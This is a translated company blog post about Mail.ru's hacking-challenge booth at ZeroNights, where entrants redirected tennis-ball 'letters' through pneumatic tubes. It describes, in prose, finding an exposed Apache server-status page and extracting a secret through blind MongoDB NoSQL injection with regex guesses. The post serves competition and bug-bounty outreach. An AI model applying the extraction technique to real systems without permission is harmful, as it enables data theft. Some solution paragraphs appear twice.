How baghunters intercepted letters in the pneumatic mail on ZeroNights
Much has already been said about Bug Bounty and the need for such programs for companies seems obvious. During the existence of our own program, Mail.ru Mail has paid more than $ 250,000, the average payment is $ 379, we have already written a little more about it. And today, using the example of the recently held information security conference ZeroNights, we will talk about how you can attract hackers to participate in the search for bugs and vulnerabilities through specialized events.
This year, the ZeroNights conference was held at the A2 Green Concert Club in St. Petersburg. Despite the move from Moscow, the conference gathered more than 1,000 participants in 2 days. The conference sounded the reports of many cool specialists. If you need a hardcore - see "NUClear explotion", "From Graphic Mode To God Mode, Discovery Vulnerabilities of GPU Virtualization", "Researching Marvell Avastar Wi-Fi: From Zero Risk to RCE". This year there were also many interesting reports about the Web, you can watch slides and WebVillage and not only. Personally, the report from Ilya Nesterov and Sergey Shekyan was important to me. Distinguishing a bot from a real user is becoming more and more difficult. More about the reports here .
Our tasks
We set ourselves the following tasks:
')
- Brand promotion and Bug Bounty program in the community.
- Recruiting sensible professionals who successfully cope with the task.
Idea
The most difficult challenge in such projects: to develop interesting tasks that, firstly, will attract participants, and secondly, will allow us to test their real skills.
Our booth this year was an office building equipped with pneumatic post. The essence of the task: the head of the pneumatic mail sends letters to the accountant, and the task of the hacker is to change the way and intercept the letter with the help of special valves.
The stand looked like this:
Instead of the mail itself, we used tennis balls, which went down from top to bottom in the required drives, by default, into “accounting”. It was necessary to activate the valves, which were controlled by the Arduino + RPi3, and redirect the "mail" to other drives.
Action scheme:
- Connect to the Wi-Fi network of the job.
- We find in the network Raspberry Pi, which is connected to the Arduino, which controls the valves.
- RPi is running a web server. Two tasks need to be completed - to exploit vulnerabilities and at the end they gave buttons to activate the dampers, which allowed them to redirect the “mail”
The ball symbolizes pnevmopismo:
Ideas for assignments we took from the reports of our researchers.
Tasks
In the first task, the participants had to find the RPi3 host and discover a typical configuration vulnerability for the Apache web server: the / server-status page, which displays all incoming HTTP requests. Among others, this page received a request with a secret value in the GET parameters, which allowed you to pass the first level. For this task, visitors received a $ 100 promotional code to participate in our Bug Bounty program.
Decision
The Apache configuration vulnerability is looked up by the usual dirbuster tools, the server-status string is in all current dictionaries. In addition, we left a few hints so that the task could be solved without any scripts and programs, even from a regular phone.
To pass the second task, it was necessary to carefully examine the contents of the already known monitoring page. In the client application code, it was necessary to find a hidden method that was not called from the interface, but contained a vulnerability - a “blind” NoSQL injection in Mongodb.
Decision
To automate blind injection, two tasks need to be accomplished:
Write a script that can receive 1 bit of information in one request. At the output you need to be able to insert into the query the logical expression of interest and, by the server’s response, understand whether it is true or false.
You can figure out how to get the information of interest from the database bit by bit (for example, if you want to know the value of the secret = 'some_secret' field, you can use regular expressions. First we recognize the first character secret ~ '^ a', secret ~ '^ b' ... secret ~ '^ s' ... After this second secret ~ '^ sa', secret ~ '^ sb' ... Similarly, we get the whole secret token).
This is not the only and not the most efficient implementation; you can look at the options better in the sqlmap code.
Write a script that can receive 1 bit of information in one request. At the output you need to be able to insert into the query the logical expression of interest and, by the server’s response, understand whether it is true or false.
You can figure out how to get the information of interest from the database bit by bit (for example, if you want to know the value of the secret = 'some_secret' field, you can use regular expressions. First we recognize the first character secret ~ '^ a', secret ~ '^ b' ... secret ~ '^ s' ... After this second secret ~ '^ sa', secret ~ '^ sb' ... Similarly, we get the whole secret token).
This is not the only and not the most efficient implementation; you can look at the options better in the sqlmap code.
The main difficulty was represented by an atypical technology stack: MeteorJS, which makes extensive use of Websockets, as well as MongoDB and Pubsub, instead of the usual HTTP requests and responses, did not allow the use of existing tools and required the participants to independently automate attacks. Many participants looked for vulnerabilities in the functionality of the MeteorJS platform itself, mistakenly mistaking it for the task code. Also for some participants there were difficulties in automating requests through Websockets.
As a prize for this contest, participants received a Mail.ru Bug Hunter sweatshirt.
results
In just two days of the conference, more than 200 people participated in our competition. The first task was handled by 100 participants, the second task was completed by 45 people.
Of course, we successfully negotiated the task successfully on the spot. New cards for $ 100 have a deferred effect, but several of them have already been activated and we got good bugs on H1. They encourage hackers to search for new bugs, help us improve our systems and improve security. Small card - great results. A hundred bucks is a hundred bucks.
Source: https://habr.com/ru/post/434334/
All Articles